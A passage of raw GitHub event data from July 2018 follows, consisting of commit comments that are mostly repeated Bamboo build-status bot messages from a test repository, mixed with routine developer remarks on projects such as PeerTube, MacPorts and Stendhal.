{"id":"8030177231","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862345,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-27T18:38:11Z","updated_at":"2018-07-27T18:38:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:38:11Z"}
{"id":"8030178445","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862347,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-27T18:38:26Z","updated_at":"2018-07-27T18:38:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:38:26Z"}
{"id":"8030180916","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"mixonic/rfcs"},"payload":{"comment":{"id":29862355,"position":120,"line":646,"path":"text/0000-module-unification-namespaces.md","commit_id":"5be49c7c0367dbf72464a6402122cf89b927ac00","created_at":"2018-07-27T18:38:59Z","updated_at":"2018-07-27T18:38:59Z","author_association":"NONE","body":"Thanks for the clear description of the pitfalls. I think you make some compelling points, especially for explicitness and directing addon culture."}},"created_at":"2018-07-27T18:38:59Z"}
{"id":"8030181658","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862359,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-27T18:39:09Z","updated_at":"2018-07-27T18:39:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:39:09Z"}
{"id":"8030182805","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862360,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-27T18:39:24Z","updated_at":"2018-07-27T18:39:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:39:24Z"}
{"id":"8030184631","type":"CommitCommentEvent","actor":{"login":"AntumDeluge"},"repo":{"name":"arianne/stendhal"},"payload":{"comment":{"id":29862369,"position":null,"line":null,"path":null,"commit_id":"fa91835170955fcef907e31f0a7fc24a2e656e38","created_at":"2018-07-27T18:39:48Z","updated_at":"2018-07-27T18:39:48Z","author_association":"MEMBER","body":"This commit message might be a little misleading because of an error on my party in the [Stendhal Missing Images wiki page](https://stendhalgame.org/wiki/Stendhal_missing_images). Eheneumniranin was listed twice, once as using the \"halfelfnpc\" sprite & another using the \"sicklinghalfelfnpc\" sprite. He only should have been listed with \"sicklinghalfelfnpc\". Only Aerianna uses \"halfelfnpc\"."}},"created_at":"2018-07-27T18:39:48Z"}
{"id":"8030184649","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862370,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-27T18:39:49Z","updated_at":"2018-07-27T18:39:49Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-27T18:39:49Z"}
{"id":"8030185733","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29862371,"position":10,"line":10,"path":"sysutils/f3/Portfile","commit_id":"0fc76cb3454cd185b6a0fadec191aa77bf65fc12","created_at":"2018-07-27T18:40:02Z","updated_at":"2018-07-27T18:40:02Z","author_association":"CONTRIBUTOR","body":"As far as I know, you're not a committer yet, so you don't have the email address \"dgilman at macports dot org\" yet, so this isn't valid. Please list your actual obfuscated (`host:user`) email address (in addition to the `@dgilman` GitHub handle)."}},"created_at":"2018-07-27T18:40:02Z"}
{"id":"8030187064","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862377,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-27T18:40:19Z","updated_at":"2018-07-27T18:40:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:40:19Z"}
{"id":"8030188515","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862380,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-27T18:40:38Z","updated_at":"2018-07-27T18:40:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:40:38Z"}
{"id":"8030189248","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862382,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-27T18:40:48Z","updated_at":"2018-07-27T18:40:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:40:48Z"}
{"id":"8030190098","type":"CommitCommentEvent","actor":{"login":"marianofreddi"},"repo":{"name":"back-pack/tienda-asothella"},"payload":{"comment":{"id":29862385,"position":24,"line":32,"path":"templates/base.html.twig","commit_id":"dfc72edbff18d6434f4ced3a5ba5ddb118b2e6ac","created_at":"2018-07-27T18:41:00Z","updated_at":"2018-07-27T18:41:00Z","author_association":"NONE","body":"Era un ID no una clase.\r\n"}},"created_at":"2018-07-27T18:41:00Z"}
{"id":"8030192127","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862387,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-27T18:41:27Z","updated_at":"2018-07-27T18:41:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:41:27Z"}
{"id":"8030194060","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862398,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-27T18:41:51Z","updated_at":"2018-07-27T18:41:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:41:51Z"}
{"id":"8030194712","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862403,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-27T18:42:00Z","updated_at":"2018-07-27T18:42:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:42:00Z"}
{"id":"8030197278","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862414,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-27T18:42:33Z","updated_at":"2018-07-27T18:42:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:42:33Z"}
{"id":"8030199611","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862426,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-27T18:43:05Z","updated_at":"2018-07-27T18:43:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:43:05Z"}
{"id":"8030200952","type":"CommitCommentEvent","actor":{"login":"sonyawolf"},"repo":{"name":"sonyawolf/github-slideshow"},"payload":{"comment":{"id":29862432,"position":null,"line":null,"path":null,"commit_id":"7fbbc2ccb903ea590a536afac43711946ca48374","created_at":"2018-07-27T18:43:22Z","updated_at":"2018-07-27T18:43:22Z","author_association":"OWNER","body":"Used dashes instead of periods"}},"created_at":"2018-07-27T18:43:22Z"}
{"id":"8030202359","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862436,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-27T18:43:41Z","updated_at":"2018-07-27T18:43:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:43:41Z"}
{"id":"8030202478","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29862437,"position":null,"line":null,"path":null,"commit_id":"96be81996d08bf25a358fef469e985be8076fa2a","created_at":"2018-07-27T18:43:42Z","updated_at":"2018-07-27T18:43:42Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1003](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1003).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1003-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T18:43:42Z"}
{"id":"8030204565","type":"CommitCommentEvent","actor":{"login":"JoshClose"},"repo":{"name":"vforteli/Flexinets.Radius.RadiusServer"},"payload":{"comment":{"id":29862446,"position":null,"line":null,"path":null,"commit_id":"41775d8e0e8a56aff4fb8d228c0377678f41800c","created_at":"2018-07-27T18:44:09Z","updated_at":"2018-07-27T18:44:09Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-27T18:44:09Z"}
{"id":"8030205470","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862449,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-27T18:44:19Z","updated_at":"2018-07-27T18:44:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:44:19Z"}
{"id":"8030207080","type":"CommitCommentEvent","actor":{"login":"Jorropo"},"repo":{"name":"Chocobozzz/PeerTube"},"payload":{"comment":{"id":29862458,"position":null,"line":null,"path":null,"commit_id":"7a93e28110b89bea658e4919038505c4b44de2b6","created_at":"2018-07-27T18:44:38Z","updated_at":"2018-07-27T18:44:38Z","author_association":"CONTRIBUTOR","body":"@Chocobozzz what is ```LAST_MIGRATION_VERSION``` ?\r\nSomethings used by the node to know how state is db if it require an update ?"}},"created_at":"2018-07-27T18:44:38Z"}
{"id":"8030207886","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862462,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-27T18:44:48Z","updated_at":"2018-07-27T18:44:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:44:48Z"}
{"id":"8030211189","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862483,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-27T18:45:31Z","updated_at":"2018-07-27T18:45:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:45:31Z"}
{"id":"8030213303","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862487,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-27T18:45:56Z","updated_at":"2018-07-27T18:45:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:45:56Z"}
{"id":"8030214183","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29862492,"position":null,"line":null,"path":null,"commit_id":"d524246911c5c6ca71365d951c61ff8133dba938","created_at":"2018-07-27T18:46:07Z","updated_at":"2018-07-27T18:46:07Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-114](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-114).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-114-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-27T18:46:07Z"}
{"id":"8030215877","type":"CommitCommentEvent","actor":{"login":"marktsuchida"},"repo":{"name":"micro-manager/micro-manager"},"payload":{"comment":{"id":29862497,"position":null,"line":null,"path":null,"commit_id":"844570741135ddb7cf6d4b3412979b2d753c1f85","created_at":"2018-07-27T18:46:30Z","updated_at":"2018-07-27T18:46:30Z","author_association":"MEMBER","body":"@nicost The merging of this PR destroyed the correspondence between SVN and the Git master branch. There is no way to fix this. We can no longer sync SVN to Git. Ever."}},"created_at":"2018-07-27T18:46:30Z"}
{"id":"8030220612","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29862507,"position":null,"line":null,"path":null,"commit_id":"ca529bb9aa6ddae6b2eaaf324336a81d9ca4987b","created_at":"2018-07-27T18:47:38Z","updated_at":"2018-07-27T18:47:38Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     1.49 |\n| `metadata_passing` |    62    |\n| `metadata_total`   |    62    |\n\n## Units\n\n| Changed                             | Status   |\n|:------------------------------------|:---------|\n| `./data/tlg0014/tlg001/__cts__.xml` | New      |\n| `./data/tlg0014/tlg002/__cts__.xml` | New      |\n| `./data/tlg0014/tlg003/__cts__.xml` | New      |\n| `./data/tlg0014/tlg005/__cts__.xml` | New      |\n| `./data/tlg0014/tlg006/__cts__.xml` | New      |\n| `./data/tlg0014/tlg007/__cts__.xml` | New      |\n| `./data/tlg0014/tlg008/__cts__.xml` | New      |\n| `./data/tlg0014/tlg009/__cts__.xml` | New      |\n| `./data/tlg0014/tlg010/__cts__.xml` | New      |\n| `./data/tlg0014/tlg011/__cts__.xml` | New      |\n| `./data/tlg0014/tlg012/__cts__.xml` | New      |\n| `./data/tlg0014/tlg013/__cts__.xml` | New      |\n| `./data/tlg0014/tlg014/__cts__.xml` | New      |\n| `./data/tlg0014/tlg015/__cts__.xml` | New      |\n| `./data/tlg0014/tlg016/__cts__.xml` | New      |\n| `./data/tlg0014/tlg017/__cts__.xml` | New      |\n| `./data/tlg0014/tlg018/__cts__.xml` | New      |\n| `./data/tlg0014/tlg019/__cts__.xml` | New      |\n| `./data/tlg0014/tlg020/__cts__.xml` | New      |\n| `./data/tlg0014/tlg021/__cts__.xml` | New      |\n| `./data/tlg0014/tlg022/__cts__.xml` | New      |\n| `./data/tlg0014/tlg023/__cts__.xml` | New      |\n| `./data/tlg0014/tlg024/__cts__.xml` | New      |\n| `./data/tlg0014/tlg025/__cts__.xml` | New      |\n| `./data/tlg0014/tlg026/__cts__.xml` | New      |\n| `./data/tlg0014/tlg027/__cts__.xml` | New      |\n| `./data/tlg0014/tlg028/__cts__.xml` | New      |\n| `./data/tlg0014/tlg029/__cts__.xml` | New      |\n| `./data/tlg0014/tlg030/__cts__.xml` | New      |\n| `./data/tlg0014/tlg031/__cts__.xml` | New      |\n| `./data/tlg0014/tlg032/__cts__.xml` | New      |\n| `./data/tlg0014/tlg033/__cts__.xml` | New      |\n| `./data/tlg0014/tlg034/__cts__.xml` | New      |\n| `./data/tlg0014/tlg035/__cts__.xml` | New      |\n| `./data/tlg0014/tlg036/__cts__.xml` | New      |\n| `./data/tlg0014/tlg037/__cts__.xml` | New      |\n| `./data/tlg0014/tlg038/__cts__.xml` | New      |\n| `./data/tlg0014/tlg039/__cts__.xml` | New      |\n| `./data/tlg0014/tlg040/__cts__.xml` | New      |\n| `./data/tlg0014/tlg041/__cts__.xml` | New      |\n| `./data/tlg0014/tlg042/__cts__.xml` | New      |\n| `./data/tlg0014/tlg043/__cts__.xml` | New      |\n| `./data/tlg0014/tlg044/__cts__.xml` | New      |\n| `./data/tlg0014/tlg045/__cts__.xml` | New      |\n| `./data/tlg0014/tlg046/__cts__.xml` | New      |\n| `./data/tlg0014/tlg047/__cts__.xml` | New      